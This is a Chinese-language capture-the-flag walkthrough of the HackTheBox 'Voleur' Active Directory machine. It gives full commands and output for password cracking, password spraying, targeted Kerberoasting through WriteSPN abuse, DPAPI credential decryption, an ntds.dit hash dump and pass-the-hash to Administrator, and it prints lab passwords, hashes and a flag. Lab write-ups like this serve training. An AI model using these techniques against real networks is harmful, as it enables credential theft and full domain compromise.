Voleur

1
2
3
4
5
6
7
8
ip a

10.129.232.130

TARGET="10.129.232.130"

Machine Information
As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

Voleur

01.信息搜集

靶机发现

目标靶机 IP 为 10.129.232.130,首先使用 fscan 进行全端口扫描与服务探测。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
fscan -h $TARGET > fscan.log

# ===== 开放端口 =====
10.129.232.130:53
10.129.232.130:389
10.129.232.130:3268
10.129.232.130:135
10.129.232.130:5985
10.129.232.130:139
10.129.232.130:88
10.129.232.130:445
10.129.232.130:2222
10.129.232.130:3269
10.129.232.130:636

# ===== 服务信息 =====
10.129.232.130:2222 ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
10.129.232.130:135 msrpc @
10.129.232.130:53 domain version bind
http://10.129.232.130:139
10.129.232.130:389 genetec-5400 0 d v 0 n0 domainFunctionality1 70 forestFunctionality1 70 ( domainControllerFunctionality1 70 1 roo...
10.129.232.130:445 microsoft-ds SMB@ A S_ A {& #WW C x `v + l0j <0: + 7 * H * H * H + 7 *0( & $not_defined_in_RFC4178@please_ignore
http://10.129.232.130:5985
10.129.232.130:3268 genetec-5400 556.1.4.1504 1.2.840.113556.1.4.1852 1.2.840.113556.1.4.802 1.2.840.113556.1.4.1907 1.2.840.113556.1...
10.129.232.130:3269 unknown
10.129.232.130:88 spark
10.129.232.130:636 unknown

# ===== Web服务 =====
http://10.129.232.130:139
http://10.129.232.130:5985

grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+' result.txt | sed 's/^.*://' | sort -nu

从 fscan 结果可以看出目标同时运行 Windows 域控服务(LDAP、Kerberos、SMB)和 Ubuntu SSH 服务,初步判断为一台 Windows 域控制器上通过 WSL 运行了 Ubuntu 实例。

02.渗透打点

端口扫描

使用 Nmap 对开放端口进行详细的服务版本探测与操作系统识别。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
sudo nmap -sT -sV -sC -O -p 53,88,135,139,389,445,636,2222,3268,3269,5985 $TARGET -oA nmapscan/detail

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-11 08:47:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped

2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Running (JUST GUESSING): Microsoft Windows 2022|10|11|2012|2016 (89%)
cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows 10 1703 or Windows 11 21H2 - 23H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)


Host script results:
| smb2-time:
| date: 2026-07-11T08:47:47
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h59m59s

sudo nmap -Pn -sV -A -p 445 -T4 $TARGET

关键发现:

  • SSH (2222):运行在远程 Ubuntu 上(通过 WSL),非 Windows 原生 SSH。
  • 域名信息Domain: voleur.htb,确认目标为 Active Directory 域环境。
  • SMB (445/139)smb2-security-mode 显示 Message signing enabled and required,这意味着无法直接进行 SMB 中继攻击(不能将捕获的 NTLM 哈希中继到 445 端口)。
  • 5985 端口:WinRM 服务(Microsoft HTTPAPI httpd 2.0),可用于远程 PowerShell 管理。

SMB 协议背景:Server Message Block (SMB) 协议采用 Client-Server 模型,用于管理对文件、目录以及网络资源(如打印机和路由器)的访问。Shares 是 SMB 服务器对外暴露的本地文件系统目录,使客户端看到的层级结构独立于服务器的实际文件结构。Access Control Lists (ACLs) 可基于用户或组进行细粒度权限控制(execute、read、full access),这些权限独立于服务器本地文件系统权限。

UDP 扫描

1
sudo nmap -sU --top-ports 20 $TARGET -oA nmapscan/udp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PORT      STATE         SERVICE
53/udp open domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown

UDP 层面除 DNS (53) 和 NTP (123) 明确开放外,其余端口均为 open|filtered 状态,未发现明显可立即利用的 UDP 攻击面。

03.渗透测试

目标域名确定为 voleur.htb,首先添加到本地 hosts 解析:

1
echo "10.129.232.130 voleur.htb" | sudo tee -a /etc/hosts

网站目前无法直接访问。题目提供了初始凭据 ryan.naylor / HollowOct31Nyt,优先尝试 SMB 文件共享。

使用 NetExec 探测目标 SMB 存活与配置:

1
2
nxc smb 10.129.232.130
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)

关键发现NTLM:False — NTLM 身份认证已被禁用,所有后续认证都必须使用 Kerberos(通过 -k 参数)。

攻击路线明确为:配置本地 Kerberos 环境 → 枚举 SMB 共享,寻找敏感文件(如 Excel 文档)→ 利用发现的凭据进行横向移动与提权。

环境配置

首先添加完整的 DNS 解析记录:

1
echo "10.129.232.130 DC.voleur.htb voleur.htb DC" | sudo tee -a /etc/hosts

使用 NetExec 自动生成 Kerberos 配置文件:

1
2
3
4
5
nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --generate-krb5-file voleur.krb5
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] krb5 conf saved to: voleur.krb5
SMB DC.voleur.htb 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB DC.voleur.htb 445 DC [-] voleur.htb\ryan.naylor:HollowOct31Nyt KRB_AP_ERR_SKEW

KRB_AP_ERR_SKEW 错误是由于本地时间与域控制器时间不同步导致(Kerberos 协议要求客户端与 KDC 时间差不超过 5 分钟)。同步系统时间解决(打完靶机后记得恢复):

1
2
3
sudo ntpdate 10.129.232.130

sudo cp voleur.krb5 /etc/krb5.conf

验证配置生效:

1
2
3
4
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] krb5 conf saved to: voleur.krb5
SMB DC.voleur.htb 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt

SMB 枚举与文件发现

使用 Kerberos 认证枚举 SMB 共享:

1
2
3
4
5
6
7
8
9
10
11
nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
[有READ权限的]
IPC$
IT
NETLOGON
SYSVOL

# 使用 --spider 选项递归遍历共享,寻找特定文件(如 .xlsx、.txt、.docx)

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --spider IT --regex '.*\.xlsx'
SMB DC.voleur.htb 445 DC //DC.voleur.htb/IT/First-Line Support/Access_Review.xlsx

IT 共享中发现了 Access_Review.xlsx。这类权限审查表格是内网横向移动的绝佳情报资产:通常包含高权限账户映射(域管理员、运维人员、DBA 的账号及对应服务器 IP)、权限缺口分析(”某某员工已离职但 XX 系统权限未回收”——天然的后门维持入口)、以及资产边界梳理(核心业务网段 vs 测试网段)。

使用 impacket 获取 TGT 票据,通过 SMB 下载文件:

1
2
3
getTGT.py voleur.htb/ryan.naylor -dc-ip 10.129.232.130
HollowOct31Nyt
//Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) 时间不对 再次同步

设置 Kerberos 票据环境变量:

1
export KRB5CCNAME=ryan.naylor.ccache

连接 SMB 并下载目标文件:

1
2
3
4
5
6
smbclient.py -k DC.voleur.htb

shares
use IT
cd First-Line Support
get Access_Review.xlsx

Excel 文件设有打开密码,使用 John the Ripper 离线破解。注意 office2john.py 在高版本 Python 中需修复 getiteratoriter 的兼容性问题:

1
2
3
4
5
6
7
8
9
10
# 备份原文件
cp /opt/homebrew/Cellar/john-jumbo/1.9.0_1/share/john/office2john.py /opt/homebrew/Cellar/john-jumbo/1.9.0_1/share/john/office2john.py.bak

# 替换所有 getiterator 为 iter
sed -i '' 's/getiterator/iter/g' /opt/homebrew/Cellar/john-jumbo/1.9.0_1/share/john/office2john.py

office2john Access_Review.xlsx > hash.txt

john --wordlist=/Users/choco/Project/HackTool/wordlists/rockyou.txt hash.txt
football1 (Access_Review.xlsx)

成功破解,密码为 football1

凭据提取与验证

打开 Excel 后提取到完整的组织架构与凭据信息:

用户账户:

User Job Title Permissions Notes
Ryan.Naylor First-Line Support Technician SMB Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant First-Line Support Technician SMB
Lacey.Miller Second-Line Support Technician Remote Management Users
Todd.Wolfe Second-Line Support Technician Remote Management Users Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs Third-Line Support Technician Remote Management Users Has access to Software folder.
Administrator Administrator Domain Admin Not to be used for daily tasks!

服务账户:

User Job Title Permissions Notes
svc_backup Windows Backup Speak to Jeremy!
svc_ldap LDAP Services P/W - M1XyC9pW7qT5Vn
svc_iis IIS Administration P/W - N5pXyW1VqM7CZ8
svc_winrm Remote Management Need to ask Lacey as she reset this recently.

情报总结:

  • Todd.Wolfe 的密码为 NightT1meP1dg3on14,但账户已被删除(Leaver),可能已失效。
  • 两个服务账户密码明文记录:
    1
    2
    svc_ldap:M1XyC9pW7qT5Vn
    svc_iis:N5pXyW1VqM7CZ8

使用 NetExec 批量验证上述凭据的有效性:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# users.txt
Ryan.Naylor
Marie.Bryant
Lacey.Miller
Todd.Wolfe
Jeremy.Combs
Administrator
svc_backup
svc_ldap
svc_iis
svc_winrm

# passwords.txt
NightT1meP1dg3on14
M1XyC9pW7qT5Vn
N5pXyW1VqM7CZ8

# 组合成 user:pass 对(已知明文)
cat > known_creds.txt << 'EOF'
Todd.Wolfe:NightT1meP1dg3on14
svc_ldap:M1XyC9pW7qT5Vn
svc_iis:N5pXyW1VqM7CZ8
EOF

# 密码喷洒
nxc smb 10.129.232.130 -u users.txt -p passwords.txt -k --continue-on-success

# 已知凭据直接验证
nxc smb 10.129.232.130 -u 'Todd.Wolfe' -p 'NightT1meP1dg3on14' -k

nxc smb 10.129.232.130 -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
nxc smb 10.129.232.130 -u 'svc_iis' -p 'N5pXyW1VqM7CZ8' -k


SMB 10.129.232.130 445 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
SMB 10.129.232.130 445 DC [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8

注意:所有 SMB 认证均需使用 -k 参数,因为目标已禁用 NTLM。

验证结果:svc_ldapsvc_iis 服务账户凭据有效,Todd.Wolfe 账户确实已失效(已删除)。

域枚举与 BloodHound 分析

BloodHound 通过 LDAP 查询拉取域内对象与关系数据,利用图论算法(图遍历、最短路径)自动发现潜在的提权路径。即使 ryan.naylor 权限较低,Active Directory 默认允许任意 Authenticated Users 读取大部分域对象信息(用户列表、组隶属关系、ACL 条目等)。

1
2
3
4
bloodhound-python -u 'ryan.naylor' -d 'voleur.htb' -p 'HollowOct31Nyt' -c all --zip -ns $TARGET

INFO: Done in 01M 57S
INFO: Compressing output into 20260711183604_bloodhound.zip

将导出的 ZIP 包导入 BloodHound 前端 (http://127.0.0.1:8080/ui/explore),从 svc_ldap 节点入手,查看其 Outbound Control:

1
SVC_LDAP@VOLEUR.HTB -> Node Info → Outbound Control

重点关注高权限服务账号的攻击路径(Lacey.Miller 的用户账户暂不处理),发现 svc_ldapsvc_winrm 拥有 WriteSPN 权限。

WriteSPN 攻击原理:

  • SPN(Service Principal Name):Kerberos 协议中用于唯一标识服务实例的名称(例如 HTTP/webserverMSSQLSvc/sql.host)。KDC 通过 SPN 定位对应的服务账户。
  • WriteSPN(FS-Write-SPN 权限):高危 ACL 权限。若用户 A 对用户 B 拥有此权限,则 A 可在 B 的对象上任意添加或删除 SPN,无需 B 的知晓或同意。
  • 在 Voleur 中的利用svc_ldapsvc_winrm 拥有 WriteSPN 权限。虽然我们不知道 svc_winrm 的密码,但可以伪造一个 SPN 挂载到该账户上,触发 Kerberoasting 攻击,获取 TGS 票据后离线破解。

为什么 svc_ldap 会拥有此权限?通常是为了方便服务账户的自动注册与委派,但在实战中,高权限账户的委派配置不当常常导致此类攻击面暴露。

攻击思路:利用 svc_ldap 的 WriteSPN 权限,向 svc_winrm 对象写入一个虚假的 SPN(如 test/dc.voleur.htb),然后立即请求该 SPN 对应的 TGS 票据。KDC 仅校验 SPN 语法,通过后即使用 svc_winrm 的 NTLM 哈希加密 TGS 返回给我们,离线破解即可获得 svc_winrm 的明文密码。理论上,WinRM 服务账户的权限高于 LDAP 服务账户,完成此步骤即可实现权限提升。

Kerberoasting 攻击

首先使用 svc_ldap 凭据向 KDC 申请 TGT 票据:

1
2
3
getTGT.py voleur.htb/svc_ldap -dc-ip $TARGET
M1XyC9pW7qT5Vn
export KRB5CCNAME=svc_ldap.ccache

使用 targetedKerberoast 工具实施 WriteSPN + Kerberoasting 攻击。该工具通过 LDAP 协议修改目标对象的 servicePrincipalName 属性(写入虚假 SPN,如 test/dc),随后立即请求该 SPN 对应的 TGS 票据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/Users/choco/Project/HackTool/windows/targetedKerberoast/targetedKerberoast.py -d VOLEUR.HTB -u svc_ldap --dc-ip 10.129.232.130  --request-user svc_winrm

/Users/choco/Project/HackTool/windows/targetedKerberoast/targetedKerberoast.py -d VOLEUR.HTB -u svc_ldap -p 'M1XyC9pW7qT5Vn' --dc-ip 10.129.232.130 --request-user svc_winrm

/Users/choco/Project/HackTool/windows/targetedKerberoast/targetedKerberoast.py \
-d VOLEUR.HTB \
-u svc_ldap \
-p 'M1XyC9pW7qT5Vn' \
--dc-ip 10.129.232.130 \
-k \
--request-user svc_winrm


/Users/choco/Project/HackTool/windows/targetedKerberoast/targetedKerberoast.py -d voleur.htb --dc-host DC -u svc_ldap@voleur.htb -k

[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$0076a90356146516a0f9c8d60b02ce0d$6c306fda7c3a520cac2c3ed4bc4b37173337d25bc3a6b98d77f0596efacd200a3a0d03449692fa7b760d504e73f033868ddb5cf4356baa7e6db08cf5258a600aebecc3a766b1d44a827120a4de56085f26c8496f9e5918281cb0cc0912441a33f88cf5668f452a1d3ab0754c471fcae7eda92d351cb379e64eb961dc3d06205754286c45edae82f25b0bc33dfb868c39f9d9dd5dc293ac1220b71cba66cb01070ae9523a6ed48bb795af1279ff8864343f85f0569fd6c0dc9c52d27ba49afd2c95c4ce62315d4914b19bff37eb737365bfdf5305a7a5875554674de453ab077d44f94206858f8093c763b799a20d89ee94b4e7795cff2e05d482b01e41d895ea6ab626fbc5f6c554596c151b24ef8f5f380adf90af28933e9d6072181e7a7667cddc424cff003bbff3942069f615dd26b08921179e87d1a6a6e3176f97a2724030ac40e2aec13bf6948121dcc52f5474fdc819fa825585ee0cfcf75c6e7bdeef304040e83f97d13e2292be923e6ac6fc9514bc9a24f85cf2d085e9b756b6930310ab095ebcaaa3976d3338805fe2844a63168e467fac0b5034db7624e5ba5e401d73fbaee1a6c4411107f118a2d4528c949eca4af7fe91511333898895c0baab4e6c238d4999ad5e53a70decc44794b7761099d7c0e5d0a6889382e6dd21e84efd8b713537c086b1b7b6feba242b3ef068b07d42f906611016d39bda22405c4a3e528eb66c1283bdf49b46c5ff84095cbc4f807874875feeeb1d8d655eefe3cb175523bd22e79bd150fe742b839d7ebf09b87136f87bd6ee4029dcc1afab8aeca7004538297b4912a175c6fe0db0484f5392aa7d720aa71db4e7d3dc83541f1c3eec58695618640f0d2abc071723fea4b60a3ac0447f62165c7724cac5a538beba899e3e89d4e4164e163cee8a9a6cff48233444944461cd7b2b4b3b3a25714bcd8cf181d381966d858a63e9e1780ac7622af63b50830aceb2166f8d13cfd89f4332a3fbb42c56df751956414897da14516af8f79fb9f11b00c253562783f2230b64b7258dd803d766e63e8539b3d6614f63fc13f4bebafbd63ac3d2760567507b7a10c50185cd9ee5b0c548b3ebe5a09bf3a667c54e49e37991e8fcc96d5890e990854e2b7c7042656f50071d987b1d849bfacfc9cb7b70ab906e172be2c6dbbbd4b27af8b9a5d5bfed83b68ceafa9218e69e4bee75ed56500b39908399bf70685a76110a2cb96481d506b113ae9d45482694b270c21c42728acd7e1c8f7e3bb33926c6a23b446dcef438bc054e24ca0fbb791351a1b009065d191f772165415aee0d549b6be992dcf31b1300f07434a0ad1968c1a52f3a47f705ec66afdc110e9e2cc67fcbf66bb8115e306b0968cfdf97c7f1716ae001066c8bd4a0ea1001b6fac0697a2e81ec5cb4ff446ccc381dca99ffec6f20e2263f7e0a45607f4a45ee2ddabbf666b07505b52ddf1adbb29ff635a4

注意:targetedKerberoast.py 的 shebang 需修改为当前 Python 环境路径 #!/Users/choco/.pyenv/versions/3.11.9/bin/python3,避免环境兼容性问题。必须指定 --dc-host 参数。

使用 hashcat 离线破解 TGS 票据,模式 13100 对应 Kerberos 5 TGS-REP etype 23:

1
2
3
hashcat -m 13100 -a 0 hash_svc_winrm.txt /Users/choco/Project/HackTool/wordlists/rockyou.txt -o cracked.txt

AFireInsidedeOzarctica980219afi

成功获取 svc_winrm 的明文密码:AFireInsidedeOzarctica980219afi

WinRM 登录

申请 svc_winrm 的 TGT 票据,并通过 Evil-WinRM 建立远程 PowerShell 会话:

1
2
3
4
5
6
7
8
# 为 svc_winrm 申请 TGT
getTGT.py voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -dc-ip 10.129.232.130

export KRB5CCNAME=$(pwd)/svc_winrm.ccache
klist

# 4. 用 evil-winrm 连接(必须使用 -r 指定 Realm,且当前 shell 有有效票据)
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

macOS 下可能遇到 WARNING: Could not load IOV methods. Check your GSSAPI C library for an update 错误,切换到 Kali 环境执行:

1
2
3
4
5
6
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB -u svc_winrm -K svc_winrm.ccache
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm


C:\Users\svc_winrm\Desktop 有 user.txt

成功获取初始立足点,user.txt 位于 C:\Users\svc_winrm\Desktop

已删除对象恢复

回顾 Excel 表格中的信息,svc_winrm 在 LDAP 中属于 RESTORE_USERS@VOLEUR.HTB 组成员,该组拥有恢复已删除 Active Directory 对象的权限。结合之前获取的 svc_ldap 凭据,可以恢复已删除的 todd.wolfe 账户。

上传 RunasCs 工具,以 svc_ldap 身份执行 AD 恢复操作:

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> upload /home/choco/htb/windows/RunasCs.exe

# 以 svc_ldap 身份列出所有已删除用户的完整 DistinguishedName
.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell -c Get-ADObject -Filter 'isDeleted -eq `$true' -IncludeDeletedObjects -Properties distinguishedName | select distinguishedName"
distinguishedName
-----------------
CN=Deleted Objects,DC=voleur,DC=htb
CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb

# 恢复
.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Restore-ADObject 'CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb'"
No output received from the process.

验证恢复结果:

1
2
3
4
5
6
7
8
9
10
11
12
.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADUser todd.wolfe"

DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
Enabled : True
GivenName : Todd
Name : Todd Wolfe
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
SamAccountName : todd.wolfe
SID : S-1-5-21-3927696377-1337352550-2781715495-1110
Surname : Wolfe
UserPrincipalName : todd.wolfe@voleur.htb

Todd.Wolfe 账户已成功恢复,已知密码为 NightT1meP1dg3on14

横向移动与凭据收集

DPAPI 凭据解密

todd.wolfe 申请 TGT 票据,访问 IT 共享中该用户的遗留配置文件:

1
2
3
getTGT.py voleur.htb/todd.wolfe:NightT1meP1dg3on14 -dc-ip 10.129.232.130

export KRB5CCNAME=$(pwd)/todd.wolfe.ccache

使用 impacket-smbclient 浏览 IT 共享,在已归档用户的 AppData 目录下找到加密的 Windows 凭据文件:

1
2
3
4
5
6
7
8
9
10
11
smbclient.py -k todd.wolfe@dc.voleur.htb
NightT1meP1dg3on14

shares
use IT
cd Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials
# 下载加密保存的凭据
get 77...
# 切换到 Protect 目录下载主密钥文件,用于解密 Credentials
cd ../Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
get 08949..

这两个文件分别为 DPAPI 加密凭据和对应的主密钥(Master Key)。使用 impacket-dpapi 工具,结合 todd.wolfe 的密码先解密主密钥,再解密凭据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 揭秘主密钥
dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14 -user todd.wolfe

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

# 解密凭据
dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

成功解密出 jeremy.combs 的凭据:qT3V9pLXyN7W4m

SSH 登录 (WSL)

之前端口扫描发现 2222 端口运行 SSH(Ubuntu WSL),且配置为仅密钥认证。利用 jeremy.combs 凭据通过 SMB 获取其 SSH 私钥:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sudo ntpdate 10.129.232.130
getTGT.py voleur.htb/jeremy.combs:qT3V9pLXyN7W4m -dc-ip 10.129.232.130
export KRB5CCNAME=$(pwd)/jeremy.combs.ccache
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB // 报错

smbclient.py -k jeremy.combs@dc.voleur.htb
qT3V9pLXyN7W4m
shares
cd IT/Third-Line Support/

cat Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin

get id_rsa

从 Note.txt 可知管理员已为 WSL 配置了备份工具环境。结合服务账户命名规律(svc_ldapsvc_iis),SSH 用户名推测为 svc_backup。使用获取的 id_rsa 私钥登录:

1
2
chmod 600 id_rsa
ssh -p 2222 svc_backup@voleur.htb -i id_rsa

域控提权

登录 WSL 后确认当前用户身份与权限:

1
2
svc_backup@DC:~$ id
uid=1000(svc_backup) gid=1000(svc_backup) groups=1000(svc_backup),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev)

svc_backup 同时属于 admsudo 组,具有较高权限。WSL 默认将 Windows 盘符挂载到 /mnt/,直接访问 Windows 文件系统:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

ls: Config.Msi: Permission denied
ls: cannot access 'DumpStack.log.tmp': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: PerfLogs: Permission denied
ls: 'System Volume Information': Permission denied
total 0
844424930132032 drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 2025 '$Recycle.Bin'
26458647810803262 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jun 30 2025 '$WinREAgent'
1407374883553285 drwxrwxrwx 1 svc_backup svc_backup 4.0K Jul 24 2025 .
281474976819491 drwxr-xr-x 1 root root 4.0K Jan 30 2025 ..
4503599627618112 d--x--x--x 1 svc_backup svc_backup 4.0K Jul 11 01:42 Config.Msi
562949953517439 lrwxrwxrwx 1 svc_backup svc_backup 12 Jan 28 2025 'Documents and Settings' -> /mnt/c/Users
? -????????? ? ? ? ? ? DumpStack.log.tmp
562949953422003 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 29 2025 Finance
562949953421997 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 29 2025 HR
562949953421983 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 29 2025 IT
281474976710721 d--x--x--x 1 svc_backup svc_backup 4.0K May 8 2021 PerfLogs
281474976710722 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jul 24 2025 'Program Files'
281474976710883 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 30 2025 'Program Files (x86)'
281474976711016 drwxrwxrwx 1 svc_backup svc_backup 4.0K Jun 4 2025 ProgramData
281474976806813 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 28 2025 Recovery
562949953493394 d--x--x--x 1 svc_backup svc_backup 4.0K Jan 30 2025 'System Volume Information'
281474976711134 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 30 2025 Users
281474976711192 dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jun 5 2025 Windows
1125899907111956 dr-xr-xr-x 1 svc_backup svc_backup 4.0K May 29 2025 inetpub
? -????????? ? ? ? ? ? pagefile.sys


cd IT;ls
'First-Line Support' 'Second-Line Support' 'Third-Line Support'

IT 目录结构与之前在 SMB 中看到的一致,各子目录对应不同级别的支持团队:

  • First-Line Support:一线支持(Ryan.Naylor、Marie.Bryant),权限最低,仅有基础 SMB 读取权限。
  • Second-Line Support:二线支持(Lacey.Miller、Todd.Wolfe),拥有 Remote Management Users 权限。
  • Third-Line Support:三线支持(Jeremy.Combs),拥有更高系统访问权限,且包含备份文件。

在 Third-Line Support 的 Backups 目录中发现了域控的 ntds.ditSYSTEM 注册表文件:

1
scp -r svc_backup@dc:/mnt/c/IT/Third-Line\ Support/Backups/ /Users/choco/Project/HackTheBox/Voleur/backup

ntds.dit 是 Active Directory 的数据库文件,包含域内所有用户的 NTLM 哈希。虽然 SMB 端口已禁用 NTLM 认证,但哈希仍可用于 Kerberos 认证(Overpass-the-Hash)。

使用 impacket-secretsdump 提取域哈希:

1
2
3
4
# 提取域哈希
secretsdump.py -ntds ./ntds.dit \
-system /Users/choco/Project/HackTheBox/Voleur/backup/Backups/registry/SYSTEM \
LOCAL > winhash.txt

成功提取域管理员哈希:

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

使用 Administrator 的 NTLM 哈希通过 Overpass-the-Hash 获取 TGT 票据,登录域控:

1
2
3
4
5
6
7
getTGT.py voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2 -dc-ip 10.129.232.130
export KRB5CCNAME=$(pwd)/administrator.ccache

evil-winrm -i dc.voleur.htb -u administrator -K administrator.ccache -r VOLEUR.HTB (kali)

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
ce5940f1a0cde8792ce15d793bdca4bd